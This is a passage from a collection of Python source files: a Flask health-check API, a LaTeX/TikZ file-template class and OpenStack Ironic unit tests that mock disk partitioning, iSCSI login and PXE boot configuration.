Calls\n#\n\n@APP.route(\'/api/v1.0/summary\')\n@APP.route(\'/api/v1.0/summary/\')\n@APP.route(\'/api/v1.0/summary.\')\ndef api_summary(content_type=\'json\'):\n """"""\n Get health summary for all Resources within this instance.\n """"""\n\n health_summary = views.get_health_summary()\n\n # Convert Runs to dict-like structure\n for run in [\'first_run\', \'last_run\']:\n run_obj = health_summary.get(run, None)\n if run_obj:\n health_summary[run] = run_obj.for_json()\n\n # Convert Resources failing to dict-like structure\n failed_resources = []\n for resource in health_summary[\'failed_resources\']:\n failed_resources.append(resource.for_json())\n health_summary[\'failed_resources\'] = failed_resources\n\n if content_type == \'json\':\n result = jsonify(health_summary)\n else:\n result = \'
\\n%s\\n
\' % \\\n render_template(\'status_report_email.txt\',\n lang=g.current_lang, summary=health_summary)\n return result\n\n\n@APP.route(\'/api/v1.0/probes-avail/\')\n@APP.route(\'/api/v1.0/probes-avail/\')\n@APP.route(\'/api/v1.0/probes-avail//\')\ndef api_probes_avail(resource_type=None, resource_id=None):\n """"""\n Get available (configured) Probes for this\n installation, optional for resource type\n """"""\n resource = None\n if resource_id:\n resource = views.get_resource_by_id(resource_id)\n\n probes = views.get_probes_avail(resource_type=resource_type,\n resource=resource)\n return jsonify(probes)\n\n\n@APP.route(\'/api/v1.0/runs/\')\n@APP.route(\'/api/v1.0/runs/.\')\n@APP.route(\'/api/v1.0/runs//\')\n@APP.route(\'/api/v1.0/runs//.\')\ndef api_runs(resource_id, run_id=None, content_type=\'json\'):\n """"""\n Get Runs (History of results) for Resource.\n """"""\n if run_id:\n runs = [views.get_run_by_id(run_id)]\n else:\n runs = views.get_run_by_resource_id(resource_id)\n\n run_arr = []\n for run in runs:\n run_dict = {\n \'id\': run.identifier,\n \'success\': run.success,\n \'response_time\': run.response_time,\n \'checked_datetime\': run.checked_datetime,\n \'message\': run.message,\n \'report\': run.report\n }\n run_arr.append(run_dict)\n\n runs_dict = {\'total\': len(run_arr), \'runs\': run_arr}\n result = \'unknown\'\n if content_type == \'json\':\n result = jsonify(runs_dict)\n elif content_type == \'html\':\n result = render_template(\'includes/runs.html\',\n lang=g.current_lang, runs=runs_dict[\'runs\'])\n return result\n\n\nif __name__ == \'__main__\': # run locally, for fun\n import sys\n\n HOST = \'127.0.0.1\'\n PORT = 8000\n if len(sys.argv) > 1:\n HOST, PORT = sys.argv[1].split(\':\')\n APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True)\n', '# Copyright 2012 (C) Mickael Menu dummy@email.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program. If not, see .\n\nfrom string import Template\n\nfrom .tags import *\n\n\nclass FileTemplate(object):\n\t""""""\n\tThe file template tool generates a full LaTeX/TikZ source from a template, preamble\n\tand source.\n\t""""""\n\tdef __init__(self, template, preamble, source):\n\t\tassert preamble is not None and source is not None\n\t\tsuper(FileTemplate, self).__init__()\n\t\tself.content = """"\n\t\tself.preamble = preamble\n\t\tself.source = source\n\t\tself.latex_template = Template(template)\n\n\tdef buildFileContent(self):\n\t\t""""""\n\t\tBuilds the TikZ document with given preamble and source and the document template.\n\t\t""""""\n\t\tself._buildPreambleChunk()\n\t\tself._buildSourceChunk()\n\t\tself._buildContentFromTemplate()\n\t\treturn self.content\n\n\tdef _buildPreambleChunk(self):\n\t\tself.preamble = ""%s\\n%s\\n%s\\n"" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG)\n\n\tdef _buildSourceChunk(self):\n\t\tself.source = ""%s\\n%s\\n%s\\n"" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG)\n\n\tdef _buildContentFromTemplate(self):\n\t\tself.content = TIKZ_TAG + ""\\n""\n\t\tself.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source)\n', '# Copyright (c) 2012 NTT DOCOMO, INC.\n# Copyright 2011 OpenStack Foundation\n# Copyright 2011 Ilya Alekseyev\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport gzip\nimport os\nimport shutil\nimport stat\nimport tempfile\nimport time\nimport types\n\nimport mock\nfrom oslo_concurrency import processutils\nfrom oslo_config import cfg\nfrom oslo_utils import uuidutils\nimport requests\nimport testtools\n\nfrom ironic.common import boot_devices\nfrom ironic.common import disk_partitioner\nfrom ironic.common import exception\nfrom ironic.common import images\nfrom ironic.common import states\nfrom ironic.common import utils as common_utils\nfrom ironic.conductor import task_manager\nfrom ironic.conductor import utils as manager_utils\nfrom ironic.drivers.modules import agent_client\nfrom ironic.drivers.modules import deploy_utils as utils\nfrom ironic.drivers.modules import image_cache\nfrom ironic.tests import base as tests_base\nfrom ironic.tests.conductor import utils as mgr_utils\nfrom ironic.tests.db import base as db_base\nfrom ironic.tests.db import utils as db_utils\nfrom ironic.tests.objects import utils as obj_utils\n\n_PXECONF_DEPLOY = b""""""\ndefault deploy\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\n""""""\n\n_PXECONF_BOOT_PARTITION = """"""\ndefault boot_partition\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\n""""""\n\n_PXECONF_BOOT_WHOLE_DISK = """"""\ndefault boot_whole_disk\n\nlabel deploy\nkernel deploy_kernel\nappend initrd=deploy_ramdisk\nipappend 3\n\nlabel boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\n\nlabel boot_whole_disk\nCOM32 chain.c32\nappend mbr:0x12345678\n""""""\n\n_IPXECONF_DEPLOY = b""""""\n#!ipxe\n\ndhcp\n\ngoto deploy\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\nboot\n""""""\n\n_IPXECONF_BOOT_PARTITION = """"""\n#!ipxe\n\ndhcp\n\ngoto boot_partition\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:{{ DISK_IDENTIFIER }}\nboot\n""""""\n\n_IPXECONF_BOOT_WHOLE_DISK = """"""\n#!ipxe\n\ndhcp\n\ngoto boot_whole_disk\n\n:deploy\nkernel deploy_kernel\ninitrd deploy_ramdisk\nboot\n\n:boot_partition\nkernel kernel\nappend initrd=ramdisk root={{ ROOT }}\nboot\n\n:boot_whole_disk\nkernel chain.c32\nappend mbr:0x12345678\nboot\n""""""\n\n_UEFI_PXECONF_DEPLOY = b""""""\ndefault=deploy\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root={{ ROOT }}""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:{{ DISK_IDENTIFIER }}""\n""""""\n\n_UEFI_PXECONF_BOOT_PARTITION = """"""\ndefault=boot_partition\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root=UUID=12345678-1234-1234-1234-1234567890abcdef""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:{{ DISK_IDENTIFIER }}""\n""""""\n\n_UEFI_PXECONF_BOOT_WHOLE_DISK = """"""\ndefault=boot_whole_disk\n\nimage=deploy_kernel\n label=deploy\n initrd=deploy_ramdisk\n append=""ro text""\n\nimage=kernel\n label=boot_partition\n initrd=ramdisk\n append=""root={{ ROOT }}""\n\nimage=chain.c32\n label=boot_whole_disk\n append=""mbr:0x12345678""\n""""""\n\n\n@mock.patch.object(time, \'sleep\', lambda seconds: None)\nclass PhysicalWorkTestCase(tests_base.TestCase):\n\n def _mock_calls(self, name_list):\n patch_list = [mock.patch.object(utils, name,\n spec_set=types.FunctionType)\n for name in name_list]\n mock_list = [patcher.start() for patcher in patch_list]\n for patcher in patch_list:\n self.addCleanup(patcher.stop)\n\n parent_mock = mock.MagicMock(spec=[])\n for mocker, name in zip(mock_list, name_list):\n parent_mock.attach_mock(mocker, name)\n return parent_mock\n\n def _test_deploy_partition_image(self, boot_option=None, boot_mode=None):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n swap_part = \'/dev/fake-part1\'\n root_part = \'/dev/fake-part2\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part,\n \'swap\': swap_part}\n\n make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb,\n configdrive_mb]\n make_partitions_expected_kwargs = {\'commit\': True}\n deploy_kwargs = {}\n\n if boot_option:\n make_partitions_expected_kwargs[\'boot_option\'] = boot_option\n deploy_kwargs[\'boot_option\'] = boot_option\n else:\n make_partitions_expected_kwargs[\'boot_option\'] = \'netboot\'\n\n if boot_mode:\n make_partitions_expected_kwargs[\'boot_mode\'] = boot_mode\n deploy_kwargs[\'boot_mode\'] = boot_mode\n else:\n make_partitions_expected_kwargs[\'boot_mode\'] = \'bios\'\n\n # If no boot_option, then it should default to netboot.\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(\n *make_partitions_expected_args,\n **make_partitions_expected_kwargs),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuids_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n expected_uuid_dict = {\n \'root uuid\': root_uuid,\n \'efi system partition uuid\': None}\n self.assertEqual(expected_uuid_dict, uuids_dict_returned)\n\n def test_deploy_partition_image_without_boot_option(self):\n self._test_deploy_partition_image()\n\n def test_deploy_partition_image_netboot(self):\n self._test_deploy_partition_image(boot_option=""netboot"")\n\n def test_deploy_partition_image_localboot(self):\n self._test_deploy_partition_image(boot_option=""local"")\n\n def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self):\n self._test_deploy_partition_image()\n\n def test_deploy_partition_image_netboot_bios(self):\n self._test_deploy_partition_image(boot_option=""netboot"",\n boot_mode=""bios"")\n\n def test_deploy_partition_image_localboot_bios(self):\n self._test_deploy_partition_image(boot_option=""local"",\n boot_mode=""bios"")\n\n def test_deploy_partition_image_netboot_uefi(self):\n self._test_deploy_partition_image(boot_option=""netboot"",\n boot_mode=""uefi"")\n\n @mock.patch.object(utils, \'get_image_mb\', return_value=129, autospec=True)\n def test_deploy_partition_image_image_exceeds_root_partition(self,\n gim_mock):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n self.assertRaises(exception.InstanceDeployFailure,\n utils.deploy_partition_image, address, port, iqn,\n lun, image_path, root_mb, swap_mb, ephemeral_mb,\n ephemeral_format, node_uuid)\n\n gim_mock.assert_called_once_with(image_path)\n\n # We mock utils.block_uuid separately here because we can\'t predict\n # the order in which it will be called.\n @mock.patch.object(utils, \'block_uuid\', autospec=True)\n def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n efi_system_part = \'/dev/fake-part1\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n efi_system_part_uuid = \'9036-482\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n\n def block_uuid_side_effect(device):\n if device == root_part:\n return root_uuid\n if device == efi_system_part:\n return efi_system_part_uuid\n\n block_uuid_mock.side_effect = block_uuid_side_effect\n parent_mock.make_partitions.return_value = {\n \'root\': root_part, \'swap\': swap_part,\n \'efi system partition\': efi_system_part}\n\n # If no boot_option, then it should default to netboot.\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""local"",\n boot_mode=""uefi""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(efi_system_part),\n mock.call.mkfs(dev=efi_system_part, fs=\'vfat\',\n label=\'efi-part\'),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid, boot_option=""local"",\n boot_mode=""uefi"")\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n block_uuid_mock.assert_any_call(\'/dev/fake-part1\')\n block_uuid_mock.assert_any_call(\'/dev/fake-part3\')\n expected_uuid_dict = {\n \'root uuid\': root_uuid,\n \'efi system partition uuid\': efi_system_part_uuid}\n self.assertEqual(expected_uuid_dict, uuid_dict_returned)\n\n def test_deploy_partition_image_without_swap(self):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 0\n ephemeral_mb = 0\n ephemeral_format = None\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n root_part = \'/dev/fake-part1\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'block_uuid\',\n \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part}\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,\n lun, image_path,\n root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format,\n node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n def test_deploy_partition_image_with_ephemeral(self):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n configdrive_mb = 0\n ephemeral_format = \'exttest\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'destroy_disk_metadata\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'swap\': swap_part,\n \'ephemeral\': ephemeral_part,\n \'root\': root_part}\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(ephemeral_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.mkfs(dev=ephemeral_part,\n fs=ephemeral_format,\n label=\'ephemeral0\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,\n lun, image_path,\n root_mb, swap_mb,\n ephemeral_mb,\n ephemeral_format,\n node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n def test_deploy_partition_image_preserve_ephemeral(self):\n """"""Check if all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 64\n ephemeral_mb = 256\n ephemeral_format = \'exttest\'\n configdrive_mb = 0\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n ephemeral_part = \'/dev/fake-part1\'\n swap_part = \'/dev/fake-part2\'\n root_part = \'/dev/fake-part3\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'mkfs\',\n \'block_uuid\', \'notify\', \'get_dev_block_size\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'swap\': swap_part,\n \'ephemeral\': ephemeral_part,\n \'root\': root_part}\n parent_mock.block_uuid.return_value = root_uuid\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=False,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(swap_part),\n mock.call.is_block_device(ephemeral_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.mkfs(dev=swap_part, fs=\'swap\',\n label=\'swap1\'),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid,\n preserve_ephemeral=True, boot_option=""netboot"")\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertFalse(parent_mock.get_dev_block_size.called)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n\n @mock.patch.object(common_utils, \'unlink_without_raise\', autospec=True)\n def test_deploy_partition_image_with_configdrive(self, mock_unlink):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n root_mb = 128\n swap_mb = 0\n ephemeral_mb = 0\n configdrive_mb = 10\n ephemeral_format = None\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n configdrive_url = \'http://127.0.0.1/cd\'\n\n dev = \'/dev/fake\'\n configdrive_part = \'/dev/fake-part1\'\n root_part = \'/dev/fake-part2\'\n root_uuid = \'12345678-1234-1234-12345678-12345678abcdef\'\n\n name_list = [\'get_dev\', \'get_image_mb\', \'discovery\', \'login_iscsi\',\n \'logout_iscsi\', \'delete_iscsi\', \'make_partitions\',\n \'is_block_device\', \'populate_image\', \'block_uuid\',\n \'notify\', \'destroy_disk_metadata\', \'dd\',\n \'_get_configdrive\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.get_image_mb.return_value = 1\n parent_mock.is_block_device.return_value = True\n parent_mock.block_uuid.return_value = root_uuid\n parent_mock.make_partitions.return_value = {\'root\': root_part,\n \'configdrive\':\n configdrive_part}\n parent_mock._get_configdrive.return_value = (10, \'configdrive-path\')\n calls_expected = [mock.call.get_image_mb(image_path),\n mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.destroy_disk_metadata(dev, node_uuid),\n mock.call._get_configdrive(configdrive_url,\n node_uuid),\n mock.call.make_partitions(dev, root_mb, swap_mb,\n ephemeral_mb,\n configdrive_mb,\n commit=True,\n boot_option=""netboot"",\n boot_mode=""bios""),\n mock.call.is_block_device(root_part),\n mock.call.is_block_device(configdrive_part),\n mock.call.dd(mock.ANY, configdrive_part),\n mock.call.populate_image(image_path, root_part),\n mock.call.block_uuid(root_part),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_partition_image(\n address, port, iqn, lun, image_path, root_mb, swap_mb,\n ephemeral_mb, ephemeral_format, node_uuid,\n configdrive=configdrive_url)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(root_uuid, uuid_dict_returned[\'root uuid\'])\n mock_unlink.assert_called_once_with(\'configdrive-path\')\n\n @mock.patch.object(utils, \'get_disk_identifier\', autospec=True)\n def test_deploy_whole_disk_image(self, mock_gdi):\n """"""Check loosely all functions are called with right args.""""""\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n lun = 1\n image_path = \'/tmp/xyz/image\'\n node_uuid = ""12345678-1234-1234-1234-1234567890abcxyz""\n\n dev = \'/dev/fake\'\n name_list = [\'get_dev\', \'discovery\', \'login_iscsi\', \'logout_iscsi\',\n \'delete_iscsi\', \'is_block_device\', \'populate_image\',\n \'notify\']\n parent_mock = self._mock_calls(name_list)\n parent_mock.get_dev.return_value = dev\n parent_mock.is_block_device.return_value = True\n mock_gdi.return_value = \'0x12345678\'\n calls_expected = [mock.call.get_dev(address, port, iqn, lun),\n mock.call.discovery(address, port),\n mock.call.login_iscsi(address, port, iqn),\n mock.call.is_block_device(dev),\n mock.call.populate_image(image_path, dev),\n mock.call.logout_iscsi(address, port, iqn),\n mock.call.delete_iscsi(address, port, iqn)]\n\n uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun,\n image_path, node_uuid)\n\n self.assertEqual(calls_expected, parent_mock.mock_calls)\n self.assertEqual(\'0x12345678\', uuid_dict_returned[\'disk identifier\'])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_verify_iscsi_connection_raises(self, mock_exec):\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.abc\', \'\']\n self.assertRaises(exception.InstanceDeployFailure,\n utils.verify_iscsi_connection, iqn)\n self.assertEqual(3, mock_exec.call_count)\n\n @mock.patch.object(os.path, \'exists\', autospec=True)\n def test_check_file_system_for_iscsi_device_raises(self, mock_os):\n iqn = \'iqn.xyz\'\n ip = ""127.0.0.1""\n port = ""22""\n mock_os.return_value = False\n self.assertRaises(exception.InstanceDeployFailure,\n utils.check_file_system_for_iscsi_device, ip, port, iqn)\n self.assertEqual(3, mock_os.call_count)\n\n @mock.patch.object(os.path, \'exists\', autospec=True)\n def test_check_file_system_for_iscsi_device(self, mock_os):\n iqn = \'iqn.xyz\'\n ip = ""127.0.0.1""\n port = ""22""\n check_dir = ""/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1"" % (ip,\n port,\n iqn)\n\n mock_os.return_value = True\n utils.check_file_system_for_iscsi_device(ip, port, iqn)\n mock_os.assert_called_once_with(check_dir)\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_verify_iscsi_connection(self, mock_exec):\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.xyz\', \'\']\n utils.verify_iscsi_connection(iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-S\',\n run_as_root=True,\n check_exit_code=[0])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n def test_force_iscsi_lun_update(self, mock_exec):\n iqn = \'iqn.xyz\'\n utils.force_iscsi_lun_update(iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-T\', iqn,\n \'-R\',\n run_as_root=True,\n check_exit_code=[0])\n\n @mock.patch.object(common_utils, \'execute\', autospec=True)\n @mock.patch.object(utils, \'verify_iscsi_connection\', autospec=True)\n @mock.patch.object(utils, \'force_iscsi_lun_update\', autospec=True)\n @mock.patch.object(utils, \'check_file_system_for_iscsi_device\',\n autospec=True)\n def test_login_iscsi_calls_verify_and_update(self,\n mock_check_dev,\n mock_update,\n mock_verify,\n mock_exec):\n address = \'127.0.0.1\'\n port = 3306\n iqn = \'iqn.xyz\'\n mock_exec.return_value = [\'iqn.xyz\', \'\']\n utils.login_iscsi(address, port, iqn)\n mock_exec.assert_called_once_with(\'iscsiadm\',\n \'-m\', \'node\',\n \'-p\', \'%s:%s\' % (address, port),\n \'-T\', iqn,\n \'--login\',\n run_as_root=True,\n check_exit_code=[0],\n attempts=5,\n delay_on_retry=True)\n\n 